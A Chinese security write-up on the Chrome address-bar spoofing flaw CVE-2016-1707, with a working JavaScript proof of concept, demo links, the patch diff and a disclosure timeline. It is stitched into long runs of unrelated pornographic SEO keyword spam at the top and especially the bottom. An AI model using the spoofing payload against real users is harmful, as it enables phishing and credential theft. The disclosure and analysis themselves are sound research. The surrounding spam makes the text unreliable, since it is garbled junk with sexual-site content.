精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Chrome瀏覽器地址欄欺騙漏洞(CVE-2016-1707)

安全 漏洞
Chrome瀏覽器地址欄欺騙漏洞(CVE-2016-1707),這個漏洞筆者于2016年6月報告給Google,現在把漏洞細節分享給大家。URL Spoofing漏洞可以偽造一個合法的網站地址。攻擊者可以利用這個漏洞對用戶發起網絡釣魚攻擊。

Chrome瀏覽器地址欄欺騙漏洞(CVE-2016-1707),這個漏洞筆者于2016年6月報告給Google,現在把漏洞細節分享給大家。URL Spoofing漏洞可以偽造一個合法的網站地址。攻擊者可以利用這個漏洞對用戶發起網絡釣魚攻擊。

受影響版本:Chrome < v52.0.2743.82,IOS < v10

0x01 漏洞詳情

  1. POC:  
  2. <script>  
  3. payload="PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNrKCk7DQo8L3NjcmlwdD4=" 
  4. function pwned() {  
  5. var t = window.open('https://www.gmail.com/''aaaa');  
  6. t.document.write(atob(payload));  
  7. t.document.write("<h1>Address bar says https://www.gmail.com/ - this is NOT https://www.gmail.com/</h1>");  
  8.  
  9. </script>  
  10. <a href="https://hack.com::/" target="aaaa" onclick="setTimeout('pwned()','500')">click me</a><br> 

那么這個漏洞是如何發生的呢?筆者現在來解讀一下整個代碼的加載過程。首先點擊click me這個鏈接,瀏覽器去打開一個name為aaaa的新窗口,這個頁面去加載“https://hack.com::”,這個地址可以隨便寫。500微秒后運行pwned(),在aaaa窗口打開https://www.gmail.com,當然這個URL可以為空。到現在為止,一切代碼運行都很正常,接下來這段代碼就是觸發漏洞的核心代碼。

base64加密的這段代碼:

  1. base64 payload code:  
  2. <body></body>  
  3. <script>  
  4. var link = document.createElement('a');  
  5. link.href = 'https://gmail.com::' 
  6. document.body.appendChild(link);  
  7. link.click();  
  8. </script> 

接下來這段代開始在aaaa窗口頁面去提交(commit)https://gmail.com::,這是一個很奇妙的事情,https://gmail.com::本是一個無效的地址,如何去被提交呢。在嘗試了多種方法后,筆者發現使用a標簽點擊的方式可以做到(window.open/location則不可以),并且使這個無效地址處在了一個等待狀態(pending status)。此時,實際Chrome是加載了about:blank(已經到了about:blank域),但在處理最后URL地址欄中的顯示時,Chrome卻選擇了處在等待狀態的https://gmail.com:: 作為最后的提交地址,加載后的https://gmail.com::在URL地址欄中會以https://gmail.com這樣的方式呈現,兩個::會被隱藏。此時,整個加載過程完成。一個完美的URL Spoofing漏洞就這樣產生了。

Online demo:

http://xisigr.com/test/spoof/chrome/1.html

http://xisigr.com/test/spoof/chrome/2.html

如果你還沒有升級版本,Chrome < v52.0.2743.82,IOS < v10,那么可以嘗試運行筆者網站上的這兩個DEMO。

0x02如何修復

這個漏洞最關鍵的地方是,Chrome允許在Web頁面加載的時候,提交一個無效的地址所導致。Google也是基于此給出了補丁文件,就是在加載Web頁面的時候不允許提交無效地址,如果檢測到是無效地址,則直接使當前URL為about:blank。

  1. [self optOutScrollsToTopForSubviews];  
  2. // Ensure the URL is as expected (and already reported to the delegate).  
  3. - DCHECK(currentURL == _lastRegisteredRequestURL) //之前只是判斷了當前URL和最后請求的URL是否相同  
  4. + // If |_lastRegisteredRequestURL| is invalid then |currentURL| will be  
  5. + // "about:blank" 
  6. + DCHECK((currentURL == _lastRegisteredRequestURL) ||  
  7. + (!_lastRegisteredRequestURL.is_valid() && //增加判斷是否是一個無效的URL  
  8. + _documentURL.spec() == [url::kAboutBlankURL)](url::kAboutBlankURL)))  
  9. << std::endl  
  10. << "currentURL = [" << currentURL << "]" << std::endl  
  11. << "_lastRegisteredRequestURL = [" << _lastRegisteredRequestURL << "]" 
  12. // This is the point where the document's URL has actually changed, and  
  13. // pending navigation information should be applied to state information.  
  14. [self setDocumentURL:net::GURLWithNSURL([_webView URL])];  
  15. - DCHECK(_documentURL == _lastRegisteredRequestURL);  
  16.  
  17. + if (!_lastRegisteredRequestURL.is_valid() &&  
  18. + _documentURL != _lastRegisteredRequestURL) {  
  19. + // if |_lastRegisteredRequestURL| is an invalid URL, then |_documentURL|  
  20. + // will be "about:blank" 
  21. + [[self sessionController] updatePendingEntry:_documentURL];  
  22. + }  
  23. + DCHECK(_documentURL == _lastRegisteredRequestURL ||  
  24. + (!_lastRegisteredRequestURL.is_valid() &&  
  25. + _documentURL.spec() == url::kAboutBlankURL));  
  26.  
  27. self.webStateImpl->OnNavigationCommitted(_documentURL);  
  28. [self commitPendingNavigationInfo];  
  29. if ([self currentBackForwardListItemHolder]->navigation_type() == 

0x03 披露時間

2016/6/22 報送給Google,https://bugs.chromium.org/

2016/6/22 Google確認漏洞,漏洞級別High

2016/7/14 Google確認獎勵$3000

2016/7/20 Google發布安全公告,CVE-2016-1707

2016/10/2 Google公開漏洞

責任編輯:武曉燕 來源: 紅黑聯盟
相關推薦

2015-12-01 10:43:55

2020-10-21 11:48:22

欺騙漏洞

2009-07-16 14:13:35

Swing地址欄

2011-05-20 17:23:41

Chrome 13

2011-11-04 15:28:49

傲游瀏覽器

2017-01-03 20:13:02

2021-05-27 20:46:22

瀏覽器地址欄谷歌

2023-01-27 11:01:54

谷歌Chrome瀏覽器

2020-10-26 09:56:40

惡意攻擊手機瀏覽器地址欄欺騙

2011-06-16 11:15:04

2010-08-26 17:54:16

微軟

2012-08-05 17:13:47

傲游

2010-08-27 09:47:07

谷歌

2009-12-28 12:16:54

2013-11-27 15:38:14

IE瀏覽器故障

2011-02-21 14:10:50

Chrome

2023-02-02 16:35:36

微軟Edge瀏覽器

2009-12-16 10:04:51

Chrome瀏覽器漏洞

2020-12-09 09:32:03

漏洞黑客瀏覽器

2021-05-27 15:06:41

Chrome瀏覽器Google
點贊
收藏

51CTO技術棧公眾號

精品香蕉视频| 蜜桃视频www网站在线观看| 麻豆精品国产传媒mv男同| 日韩在线观看免费av| 99国产精品免费视频| 92久久精品| 国产女人水真多18毛片18精品视频| 国产美女高潮久久白浆| 国产在线综合网| 精品99久久| 欧美成人vr18sexvr| 日日摸日日碰夜夜爽av| 国产美女福利在线| 99精品热视频| 亚洲一区二区三区乱码aⅴ蜜桃女| 日韩手机在线观看| 天天综合亚洲| 亚洲欧美一区二区三区久久| 中文字幕avav| 成人午夜精品| 欧美日韩国产色| 天天在线免费视频| 第一页在线观看| 成人国产精品免费观看动漫| 国产欧美日韩亚洲精品| 天堂在线免费观看视频| 欧美二区不卡| 中文字幕日韩av电影| 日本免费福利视频| 91蜜桃臀久久一区二区| 91精品国产高清一区二区三区 | 538prom精品视频线放| 久久久999视频| 福利小视频在线| 亚洲色图丝袜美腿| 亚洲欧美日产图| 精品美女视频在线观看免费软件 | 在线视频超级| 亚洲成人av一区| av磁力番号网| 成人影院在线观看| 亚洲欧美综合网| 亚洲韩国在线| www.亚洲视频| 中文av字幕一区| 午夜视频久久久| 国产私拍精品| 日本一区二区三级电影在线观看 | 欧美性受xxxx黑人xyx性爽| 久色视频在线播放| 麻豆mv在线观看| 精品久久久久久国产| 全黄性性激高免费视频| 丁香花在线电影小说观看| 亚洲一区二区三区自拍| 男人的天堂视频在线| av大片在线| 一区二区三区视频在线观看| 亚洲成人动漫在线| 97超碰资源站在线观看| 一区二区三区不卡视频| 国产精品一色哟哟| 日本免费一区二区六区| 欧美性开放视频| 久草综合在线观看| 青青伊人久久| 日韩精品在线看片z| jjzz黄色片| 羞羞答答一区二区| 国产午夜精品全部视频播放 | 久久影院一区| 久久在精品线影院精品国产| 久草视频中文在线| 国产亚洲在线| 国产精品人人做人人爽| 国产精品无码专区av免费播放| 国产精品自产自拍| 国产另类自拍| 国内精品在线视频| 亚洲人吸女人奶水| 国产婷婷一区二区三区| 另类激情视频| 555www色欧美视频| 亚洲熟女一区二区| 国产欧美日韩精品一区二区免费| 在线精品视频视频中文字幕| 亚洲欧美一区二区三区四区五区| 午夜激情一区| 日韩av免费在线播放| 91亚洲精品国偷拍自产在线观看| 国产91色综合久久免费分享| 欧美精品v日韩精品v国产精品| 日本在线看片免费人成视1000| 亚洲精品一二三| 男人操女人免费| 九七影院97影院理论片久久| 精品人伦一区二区色婷婷| 丰满少妇高潮一区二区| 亚洲电影在线一区二区三区| 欧美一二三视频| 国产欧美熟妇另类久久久| 91在线你懂得| 久久av秘一区二区三区| 一区二区精品伦理...| 欧美日韩亚洲另类| 久久无码人妻精品一区二区三区| 99久久.com| 日韩美女激情视频| 亚洲精品国产suv一区| 国产色91在线| 欧美 日韩 亚洲 一区| 日韩一级特黄| 亚洲欧美日韩精品久久奇米色影视 | 国产日韩精品一区二区浪潮av | 亚洲深夜av| 亚洲精品免费网站| aiai在线| 日本韩国欧美一区二区三区| 久草视频福利在线| 中文字幕午夜精品一区二区三区| 日本亚洲欧洲色α| 成人爽a毛片一区二区| 亚洲欧洲av在线| 亚洲色精品三区二区一区| 91麻豆精品激情在线观看最新| 俺去亚洲欧洲欧美日韩| www.日韩一区| 久久影院午夜片一区| 欧美精品卡一卡二| 亚洲小说春色综合另类电影| 久久香蕉国产线看观看网| 中文字幕一区二区三区四区欧美| 不卡一区二区在线| 成年人视频网站免费| **国产精品| 日韩亚洲国产中文字幕| 波多野结衣家庭主妇| 26uuu精品一区二区在线观看| 欧美一级欧美一级| 大型av综合网站| 欧美激情网站在线观看| 精品欧美一区二区精品少妇| 亚洲欧美日韩综合aⅴ视频| 狠狠干狠狠操视频| 日韩中文首页| 成人免费在线视频网站| 欧美尤物美女在线| 欧美久久久久久久久| 精品少妇一区二区三区密爱| 免费高清在线一区| 伊人情人网综合| 91成人福利社区| 久久影院模特热| 国产a级免费视频| 亚洲激情网站免费观看| 午夜性福利视频| 伊人影院久久| 久久精品magnetxturnbtih| 国产免费拔擦拔擦8x高清在线人| 亚洲第一中文字幕在线观看| 久久夜靖品2区| 久久久精品人体av艺术| 在线观看av网页| 亚洲欧美偷拍自拍| 国产精品久久久久久久久久久久午夜片| 暖暖在线中文免费日本| 日韩风俗一区 二区| 久草视频一区二区| 中文一区二区在线观看| 国产欧美精品一二三| 欧美日韩国产免费观看| 国产视频一区二区三区四区| 国产理论在线| 在线日韩精品视频| 精品人妻伦一二三区久久| 亚洲成人av中文| 亚洲第一综合网| 国产一区二区三区免费观看| 国产精品久久久久9999爆乳| 亚洲网址在线观看| 国产91精品在线播放| 久草中文在线| 精品视频在线播放免| 亚洲天堂手机版| 一区二区三区中文免费| 免费中文字幕av| 久久99精品久久久久婷婷| www.av91| 日韩激情在线| 国产在线一区二区三区播放| 日韩视频网站在线观看| 久国内精品在线| 国产三级电影在线观看| 欧美一级免费大片| 一级片免费在线播放| 亚洲免费观看高清完整| 亚洲综合网在线观看| 国产主播一区二区| 日本成人在线免费视频| 欧美在线亚洲| 五月天丁香综合久久国产| 中文字幕一区日韩精品| 国产精品一区二区三区在线播放 | 亚洲久久一区二区| 永久久久久久| 国产精品探花在线观看| 成人资源视频网站免费| se69色成人网wwwsex| 午夜精品美女自拍福到在线| 欧美边添边摸边做边爱免费| 国产视频一区在线| 亚洲精品911| 欧美精品v国产精品v日韩精品| www.毛片.com| 亚洲综合久久久| 小向美奈子av| 国产日韩欧美精品在线| 精品人妻一区二区三区日产| 国产一区在线观看麻豆| 一区二区三区 日韩| 久久精品女人天堂| 欧美一级免费播放| 欧美精品麻豆| 在线精品亚洲一区二区| 免费精品国产| 欧美理论一区二区| 六月丁香久久丫| 国产区二精品视| swag国产精品一区二区| 51国偷自产一区二区三区的来源| 亚洲人体在线| 91精品综合久久久久久五月天| 自拍偷自拍亚洲精品被多人伦好爽| 午夜精品一区二区三区在线视| 天堂8中文在线| 操日韩av在线电影| 久久久久久国产精品免费无遮挡| 最近2019年手机中文字幕 | 欧美美乳视频| 美女主播视频一区| 九九精品久久| 区一区二区三区中文字幕| 色爱av综合网| 久久伊人资源站| 亚洲欧美日本伦理| 欧美日韩喷水| 狠狠色狠狠色综合婷婷tag| 欧美一区二区三区在线播放| 免费看日本一区二区| 欧洲精品在线一区| 欧美日中文字幕| 亚洲精品一区二| 欧美电影免费| 国产又粗又硬又长| 欧美黄在线观看| 国产精品久久国产| 亚洲茄子视频| 97在线播放视频| 丝袜美腿亚洲色图| 欧美特级aaa| 国产成人综合亚洲91猫咪| 任你躁av一区二区三区| 99久久精品国产毛片| 免费在线观看你懂的| 国产欧美日产一区| 2025国产精品自拍| 亚洲成人av电影在线| 欧美a∨亚洲欧美亚洲| 91成人在线精品| 中文字幕日本人妻久久久免费| 3atv在线一区二区三区| 亚洲AV无码成人片在线观看| 日韩黄在线观看| 日韩欧美小视频| 欧美丰满少妇xxxx| 在线天堂新版最新版在线8| 国产精品日韩欧美| 亚洲午夜精品| 日本精品一区二区| 亚洲乱码精品| www.com毛片| 久久国产视频网| 精品熟女一区二区三区| 国产视频一区不卡| 久久国产精品波多野结衣| 岛国视频午夜一区免费在线观看| 亚洲系列第一页| 亚洲国产天堂久久综合| 91精品专区| 久久久人成影片一区二区三区观看 | 亚洲精品欧美日韩专区| 人人精品视频| 在线一区亚洲| 国产一区二区三区久久| 精品国产鲁一鲁一区二区三区| 91在线你懂得| 黄色一级视频免费| 欧美视频在线播放| 欧洲成人一区二区三区| 色妞欧美日韩在线| 色吧亚洲日本| 999国内精品视频在线| 精品国产91久久久久久浪潮蜜月| 米仓穗香在线观看| 日本三级亚洲精品| 中文在线观看免费视频| 国产精品传媒在线| 免费观看成人毛片| 欧美zozo另类异族| 日本免费视频在线观看| 欧日韩不卡在线视频| 日韩一区网站| 亚洲欧洲久久| 久久香蕉精品| 7788色淫网站小说| 亚洲一区二区三区四区的| 91精品国产乱码久久久| 国产丝袜一区二区| 丁香花在线观看完整版电影| 国产一区红桃视频| 欧美视频免费| 国内外免费激情视频| 99久久精品国产一区| 久久久精品人妻一区二区三区四| 欧美日韩国产高清一区二区三区| 精品99又大又爽又硬少妇毛片| 国模视频一区二区| 久久综合给合| 中文字幕精品—区二区日日骚| 日日夜夜精品免费视频| 99久久久久久久久久| 午夜视频在线观看一区二区 | 亚洲欧美国产视频| 日韩电影毛片| 国语精品中文字幕| 亚洲日产国产精品| 在线天堂www在线国语对白| 亚洲午夜久久久| 精品国产无码一区二区| 久热精品视频在线| 国产精品久久久久久av公交车| 亚洲人成人77777线观看| 全国精品久久少妇| 大胸美女被爆操| 欧美日韩精品欧美日韩精品| 亚洲乱亚洲乱妇| 国产精品欧美激情在线播放| 精品欧美久久| 日本美女视频一区| 国产精品美日韩| 国产精品自偷自拍| 欧美日韩国产成人在线| 超碰97久久国产精品牛牛| japanese在线播放| 成人午夜精品在线| 亚洲第一在线播放| 亚洲视频一区二区| 美女色狠狠久久| 中文字幕久精品免| 丰满白嫩尤物一区二区| 女人十八岁毛片| 亚洲偷熟乱区亚洲香蕉av| 国产亚洲精品精品国产亚洲综合| 影音欧美亚洲| 成人综合婷婷国产精品久久免费| 日韩xxxxxxxxx| 国产一区二区三区视频| 欧美美女被草| 亚洲熟妇无码av在线播放| 99精品热视频| 中文字幕欧美色图| 九九久久久久99精品| 久久精品福利| 手机视频在线观看| 一区二区久久久久| 日韩a在线观看| 国产欧美中文字幕| 激情亚洲成人| www.日本高清视频| 欧美xingq一区二区| 成人影院大全| 超碰在线免费观看97| kk眼镜猥琐国模调教系列一区二区| 亚洲天堂av片| 久久精品视频中文字幕| 老司机凹凸av亚洲导航| 韩国视频一区二区三区| 亚洲一区二区精品视频| 国产最新视频在线| 国产经品一区二区| 日韩激情视频网站| 日本三级网站在线观看| 中文字幕亚洲精品| 国产精东传媒成人av电影| 麻豆三级在线观看| 舔着乳尖日韩一区| 免费大片黄在线观看视频网站| 精品国产乱码久久久久久郑州公司 | 国产免费av高清在线| 99久久精品免费看国产四区 |